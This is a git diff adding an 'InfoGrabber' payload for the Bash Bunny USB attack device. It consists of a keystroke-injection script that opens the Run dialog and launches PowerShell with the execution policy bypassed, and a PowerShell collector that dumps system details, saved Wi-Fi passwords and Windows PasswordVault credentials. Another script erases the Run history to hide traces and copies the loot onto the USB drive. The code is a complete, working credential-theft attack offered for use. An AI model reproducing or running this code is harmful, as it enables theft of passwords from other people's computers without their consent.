diff --git a/payloads/library/InfoGrabber/info.ps1 b/payloads/library/InfoGrabber/info.ps1 new file mode 100644 index 00000000..e97622f6 --- /dev/null +++ b/payloads/library/InfoGrabber/info.ps1 @@ -0,0 +1,206 @@ +# Shows details of currently running PC +# Simen Kjeserud (Original creator), Gachnang + +#Get info about pc +$computerPubIP=(Invoke-WebRequest ipinfo.io/ip).Content +$computerIP = get-WmiObject Win32_NetworkAdapterConfiguration|Where {$_.Ipaddress.length -gt 1} +$IsDHCPEnabled = $false +$Networks = Get-WmiObject Win32_NetworkAdapterConfiguration -Filter "DHCPEnabled=$True" | ? {$_.IPEnabled} +foreach ($Network in $Networks) { +If($network.DHCPEnabled) { +$IsDHCPEnabled = $true + } +[string[]]$computerMAC =$Network.MACAddress +} + +$computerSystem = Get-CimInstance CIM_ComputerSystem +$computerBIOS = Get-CimInstance CIM_BIOSElement + +$computerOs=Get-WmiObject win32_operatingsystem | select Caption, CSName, Version, @{Name="InstallDate";Expression={([WMI]'').ConvertToDateTime($_.InstallDate)}} , @{Name="LastBootUpTime";Expression={([WMI]'').ConvertToDateTime($_.LastBootUpTime)}}, @{Name="LocalDateTime";Expression={([WMI]'').ConvertToDateTime($_.LocalDateTime)}}, CurrentTimeZone, CountryCode, OSLanguage, SerialNumber, WindowsDirectory | Format-List +$computerCpu=Get-WmiObject Win32_Processor | select DeviceID, Name, Caption, Manufacturer, MaxClockSpeed, L2CacheSize, L2CacheSpeed, L3CacheSize, L3CacheSpeed | Format-List +$computerMainboard=Get-WmiObject Win32_BaseBoard | Format-List + +$computerRamCapacity=Get-WmiObject Win32_PhysicalMemory | Measure-Object -Property capacity -Sum | % { "{0:N1} GB" -f ($_.sum / 1GB)} +$computerRam=Get-WmiObject Win32_PhysicalMemory | select DeviceLocator, @{Name="Capacity";Expression={ "{0:N1} GB" -f ($_.Capacity / 1GB)}}, ConfiguredClockSpeed, ConfiguredVoltage | Format-Table + +# Get HDDs +$driveType = @{ + 2="Removable disk " + 3="Fixed local disk " + 4="Network disk " + 5="Compact disk "} +$Hdds = Get-WmiObject Win32_LogicalDisk | select DeviceID, VolumeName, @{Name="DriveType";Expression={$driveType.item([int]$_.DriveType)}}, FileSystem,VolumeSerialNumber,@{Name="Size_GB";Expression={"{0:N1} GB" -f ($_.Size / 1Gb)}}, @{Name="FreeSpace_GB";Expression={"{0:N1} GB" -f ($_.FreeSpace / 1Gb)}}, @{Name="FreeSpace_percent";Expression={"{0:N1}%" -f ((100 / ($_.Size / $_.FreeSpace)))}} | Format-Table DeviceID, VolumeName,DriveType,FileSystem,VolumeSerialNumber,@{ Name="Size GB"; Expression={$_.Size_GB}; align="right"; }, @{ Name="FreeSpace GB"; Expression={$_.FreeSpace_GB}; align="right"; }, @{ Name="FreeSpace %"; Expression={$_.FreeSpace_percent}; align="right"; } + +# Check RDP +$RDP +if ((Get-ItemProperty "hklm:\System\CurrentControlSet\Control\Terminal Server").fDenyTSConnections -eq 0) { + $RDP = "RDP is Enabled" +} else { + $RDP = "RDP is NOT enabled" +} + +# Get network interfaces +#| where { $_.ipaddress -notlike $null } +$Network = Get-WmiObject Win32_NetworkAdapterConfiguration | where { $_.MACAddress -notlike $null } | select Index, Description, IPAddress, DefaultIPGateway, MACAddress | Format-Table Index, Description, IPAddress, DefaultIPGateway, MACAddress + +# Get wifi SSID and password +$WLANProfileNames =@() +#Get all the WLAN profile names +$Output = netsh.exe wlan show profiles | Select-String -pattern " : " +#Trim the output to receive only the name +Foreach($WLANProfileName in $Output){ + $WLANProfileNames += (($WLANProfileName -split ":")[1]).Trim() +} +$WLANProfileObjects =@() +#Bind the WLAN profile names and also the password to a custom object +Foreach($WLANProfileName in $WLANProfileNames){ + #get the output for the specified profile name and trim the output to receive the password if there is no password it will inform the user + try{ + $WLANProfilePassword = (((netsh.exe wlan show profiles name="$WLANProfileName" key=clear | select-string -Pattern "Key Content") -split ":")[1]).Trim() + }Catch{ + $WLANProfilePassword = "The password is not stored in this profile" + } + #Build the object and add this to an array + $WLANProfileObject = New-Object PSCustomobject + $WLANProfileObject | Add-Member -Type NoteProperty -Name "ProfileName" -Value $WLANProfileName + $WLANProfileObject | Add-Member -Type NoteProperty -Name "ProfilePassword" -Value $WLANProfilePassword + $WLANProfileObjects += $WLANProfileObject + Remove-Variable WLANProfileObject +} + +# local-user +$luser=Get-WmiObject -Class Win32_UserAccount | Format-Table Caption, Domain, Name, FullName, SID + +# process first +$process=Get-WmiObject win32_process | select Handle, ProcessName, ExecutablePath, CommandLine + +# get listeners / ActiveTcpConnections +#[System.Net.NetworkInformation.IPGlobalProperties]::GetIPGlobalProperties().GetActiveTcpConnections() | Format-Table -AutoSize +$listener = Get-NetTCPConnection | select @{Name="LocalAddress";Expression={$_.LocalAddress + ":" + $_.LocalPort}}, @{Name="RemoteAddress";Expression={$_.RemoteAddress + ":" + $_.RemotePort}}, State, AppliedSetting, OwningProcess +$listener = $listener | foreach-object { + $listenerItem = $_ + $processItem = ($process | where { [int]$_.Handle -like [int]$listenerItem.OwningProcess }) + new-object PSObject -property @{ + "LocalAddress" = $listenerItem.LocalAddress + "RemoteAddress" = $listenerItem.RemoteAddress + "State" = $listenerItem.State + "AppliedSetting" = $listenerItem.AppliedSetting + "OwningProcess" = $listenerItem.OwningProcess + "ProcessName" = $processItem.ProcessName + } +} | select LocalAddress, RemoteAddress, State, AppliedSetting, OwningProcess, ProcessName | Sort-Object LocalAddress | Format-Table + +# process last +$process = $process | Sort-Object ProcessName | Format-Table Handle, ProcessName, ExecutablePath, CommandLine + +# service +$service=Get-WmiObject win32_service | select State, Name, DisplayName, PathName, @{Name="Sort";Expression={$_.State + $_.Name}} | Sort-Object Sort | Format-Table State, Name, DisplayName, PathName + +# installed software (get uninstaller) +$software=Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | where { $_.DisplayName -notlike $null } | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Sort-Object DisplayName | Format-Table -AutoSize + +# drivers +$drivers=Get-WmiObject Win32_PnPSignedDriver| where { $_.DeviceName -notlike $null } | select DeviceName, FriendlyName, DriverProviderName, DriverVersion + +# videocard +$videocard=Get-WmiObject Win32_VideoController | Format-Table Name, VideoProcessor, DriverVersion, CurrentHorizontalResolution, CurrentVerticalResolution + +#Get installed passwords +$profileRows = $output | Select-String -Pattern 'All User Profile' +$profileNames = New-Object System.Collections.ArrayList +for($i = 0; $i -lt $profileRows.Count; $i++){ +$profileName = ($profileRows[$i] -split ":")[-1].Trim() +$profileOutput = netsh.exe wlan show profiles name="$profileName" key=clear +$SSIDSearchResult = $profileOutput| Select-String -Pattern 'SSID Name' +$profileSSID = ($SSIDSearchResult -split ":")[-1].Trim() -replace '"' +$passwordSearchResult = $profileOutput| Select-String -Pattern 'Key Content' +if($passwordSearchResult){ +$profilePw = ($passwordSearchResult -split ":")[-1].Trim() +} else { +$profilePw = '' +} +$networkObject = New-Object -TypeName psobject -Property @{ +ProfileName = $profileName +SSID = $profileSSID +Password = $profilePw +} +$profileNames.Add($networkObject) +} +$profileNames.Add($networkObject) + +[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime] +$vault = New-Object Windows.Security.Credentials.PasswordVault +$vault = $vault.RetrieveAll() | % { $_.RetrievePassword();$_ } + +#The output +Clear-Host +Write-Host + +$computerSystem.Name +"==================================================================" +"Manufacturer: " + $computerSystem.Manufacturer +"Model: " + $computerSystem.Model +"Serial Number: " + $computerBIOS.SerialNumber +"" +"" +"" + +"OS:" +"=================================================================="+ ($computerOs| out-string) + +"CPU:" +"=================================================================="+ ($computerCpu| out-string) + +"RAM:" +"==================================================================" +"Capacity: " + $computerRamCapacity+ ($computerRam| out-string) + +"Mainboard:" +"=================================================================="+ ($computerMainboard| out-string) + +"Bios:" +"=================================================================="+ (Get-WmiObject win32_bios| out-string) + + + +"Local-user:" +"=================================================================="+ ($luser| out-string) + +"HDDs:" +"=================================================================="+ ($Hdds| out-string) + +"Network: " +"==================================================================" +"Computers MAC adress: " + $computerMAC +"Computers IP adress: " + $computerIP.ipaddress[0] +"Public IP adress: " + $computerPubIP +"RDP: " + $RDP +"" +($Network| out-string) + +"W-Lan profiles: " +"=================================================================="+ ($WLANProfileObjects| out-string) + +"listeners / ActiveTcpConnections" +"=================================================================="+ ($listener| out-string) + +"Current running process: " +"=================================================================="+ ($process| out-string) + +"Services: " +"=================================================================="+ ($service| out-string) + +"Installed software:" +"=================================================================="+ ($software| out-string) + +"Installed drivers:" +"=================================================================="+ ($drivers| out-string) + +"Installed videocards:" +"==================================================================" + ($videocard| out-string) + +"Windows/user passwords" +"==================================================================" +$vault | select Resource, UserName, Password | Sort-Object Resource | ft -AutoSize + + diff --git a/payloads/library/InfoGrabber/payload.txt b/payloads/library/InfoGrabber/payload.txt new file mode 100644 index 00000000..aad67e3c --- /dev/null +++ b/payloads/library/InfoGrabber/payload.txt @@ -0,0 +1,43 @@ +#!/bin/bash +# +# Title: Info_Grabber +# Author: Simen Kjeserud +# Version: 1.0 +# Target: Windows +# Creds: Hak5Darren for inspiration +# +# Executes run.ps1 which executes scripts that gets you information about +# the computer running and will also get wifi passwords + + +LED R B 100 +ATTACKMODE HID STORAGE + +#Check swith copied from bunny_helper + +check_switch() { + switch1=`cat /sys/class/gpio_sw/PA8/data` + switch2=`cat /sys/class/gpio_sw/PL4/data` + switch3=`cat /sys/class/gpio_sw/PL3/data` + if [ "x$switch1" = "x0" ] && [ "x$switch2" = "x1" ] && [ "x$switch3" = "x1" ]; then + SWITCH_POSITION="switch1" + elif [ "x$switch1" = "x1" ] && [ "x$switch2" = "x0" ] && [ "x$switch3" = "x1" ]; then + SWITCH_POSITION="switch2" + elif [ "x$switch1" = "x1" ] && [ "x$switch2" = "x1" ] && [ "x$switch3" = "x0" ]; then + SWITCH_POSITION="switch3" + else + SWITCH_POSITION="invalid" + fi +} + +check_switch + +# Set your language here +QUACK SET_LANGUAGE no +QUACK GUI r +QUACK DELAY 200 +# Open run and run the run.ps1 script in the Bashbunny +QUACK STRING powershell -executionpolicy Bypass ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')" +QUACK ENTER +LED G +#Green means good to go diff --git a/payloads/library/InfoGrabber/readme.md b/payloads/library/InfoGrabber/readme.md new file mode 100644 index 00000000..7432383d --- /dev/null +++ b/payloads/library/InfoGrabber/readme.md @@ -0,0 +1,81 @@ +# InfoGrabber for the Bunnys + +Author: Simen Kjeserud + +Version: Version 1.0 + +Credit: Hak5Darren for inspiration + + ((`\ + ___ \\ '--._ + .'` `' o ) + / \ '. __.' + _| /_ \ \_\_ + {_\______\-'\__\_\ + Check out my website: + aknemis.com + +## Description + +Gather a lot of information about the computer and place it in a text file in loot/info/. + +Here you can se what it will look like: + + + System Information for: DESKTOP-9BVPPVN + + Manufacturer: Dell Inc. + + Model: XPS 13 9360 + + Serial Number: ******* + + CPU: Intel(R) Core(TM) i7-7500U CPU @ 2.70GHz + + HDD Capacity: 464.38GB + + HDD Space: 82.32 % Free (382.28GB) + + RAM: 15.89GB + + Operating System: Microsoft Windows 10 Home, Service Pack: 0 + + User logged In: DESKTOP-9BVPPVN\aknem + + Last Reboot: 02/21/2017 19:49:30 + + Computers MAC adress: **************** + + Computers IP adress: *********** + + Public IP adress: **************** + + RDP: RDP is NOT enabled + + + | ProfileName | SSID | Password | + | ---------------- | ------------------------------------- | ------------------------------------- | + | privatsna11234 | privatsna11234 | ******** | + | privatsna11234 | privatsna11234 | ******** | + + + +## Configuration + +Made for windows. The only thing you will need to change is the Ducky language so it matches the keyboard input. + +## Requirements + +DuckyTools for the BashBunny, and you need to change to the language the computer uses. + +## STATUS + +| LED | Status | +| ---------------- | ------------------------------------- | +| Purple (blinking)| Attack in progress | +| Green | Attack Finished | + + + +## Discussion (Not yet created) +[Hak5 Forum Thread not yet created](https://forums.hak5.org/index.php?/topic/ "Hak5 Forum Thread") diff --git a/payloads/library/InfoGrabber/run.ps1 b/payloads/library/InfoGrabber/run.ps1 new file mode 100644 index 00000000..0a4e251a --- /dev/null +++ b/payloads/library/InfoGrabber/run.ps1 @@ -0,0 +1,35 @@ +#Remove run history +powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue" + +#Get the path and file name that you are using for output +# find connected bashbunny drive: +$VolumeName = "bashbunny" +$computerSystem = Get-CimInstance CIM_ComputerSystem +$backupDrive = $null +get-wmiobject win32_logicaldisk | % { + if ($_.VolumeName -eq $VolumeName) { + $backupDrive = $_.DeviceID + } +} + +#See if a loot folder exist in usb. If not create one +$TARGETDIR = $backupDrive + "\loot" +if(!(Test-Path -Path $TARGETDIR )){ + New-Item -ItemType directory -Path $TARGETDIR +} + +#See if a info folder exist in loot folder. If not create one +$TARGETDIR = $backupDrive + "\loot\info" +if(!(Test-Path -Path $TARGETDIR )){ + New-Item -ItemType directory -Path $TARGETDIR +} + +#Create a path that will be used to make the file +$datetime = get-date -f yyyy-MM-dd_HH-mm +$backupPath = $backupDrive + "\loot\info\" + $computerSystem.Name + " - " + $datetime + ".txt" + +#Create output from info script +$TARGETDIR = $MyInvocation.MyCommand.Path +$TARGETDIR = $TARGETDIR -replace ".......$" +cd $TARGETDIR +PowerShell.exe -ExecutionPolicy Bypass -File info.ps1 > $backupPath \ No newline at end of file